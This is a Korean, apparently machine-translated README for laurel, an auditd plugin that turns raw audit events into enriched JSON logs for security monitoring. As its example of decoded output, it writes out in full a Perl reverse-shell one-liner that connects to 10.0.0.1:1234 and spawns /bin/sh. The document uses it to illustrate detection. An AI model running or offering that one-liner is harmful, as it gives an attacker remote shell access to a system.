laurel
v0.6.4
로렐은 최신 보안 모니터링 설정에 적합한 유용하고 풍부한 JSON 기반 감사 로그를 생성하는 AUDITD (8) 용 이벤트 후 처리 플러그인입니다.
최신 안정 릴리스에 해당하는 문서는 여기에서 찾을 수 있습니다.
TLDR : 이와 같이 보이는 감사 이벤트 대신…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
… 로렐은 공격자/침투 테스터/레드 팀원이 처음으로 한눈에 분명 해지는 혼란이있는 JSON 통나무로 바꿉니다.
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
로렐은 감사 이벤트가 생성되는 호스트에서 실행되기 때문에 소스에서 발생합니다. 이벤트는 부모 프로세스 (PPID)에 대한 유용한 정보가 풍부합니다.
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
구성 및 운영 세부 사항은 월계수 (8) 수동 페이지에 설명되어 있습니다. 로그 형식 및 이론적 근거에 대한 자세한 내용은 Laurel-About (7) 매뉴얼 페이지에서 찾을 수 있습니다. Laurel-Audit-Rules (7) 페이지에는 공격자의 전술을 감지하는 데 유용한 감사 규칙 구성에 대한 조언과 예가 포함되어 있습니다.
월계수 설치 지침에는 소스에서 Laruel을 구축하는 방법 및 설치 및 구성 방법에 대한 지침이 포함되어 있습니다.
우리는 기존 프로젝트 및 제품의 기능 세트와 성능 특성에 만족하지 않기 때문에 월계수를 개발했습니다. 자세한 내용은 성능 문서를 참조하십시오.
GNU 일반 공개 라이센스, 버전 3
로고는 Birgit Meyer <[email protected]>에 의해 만들어졌습니다.
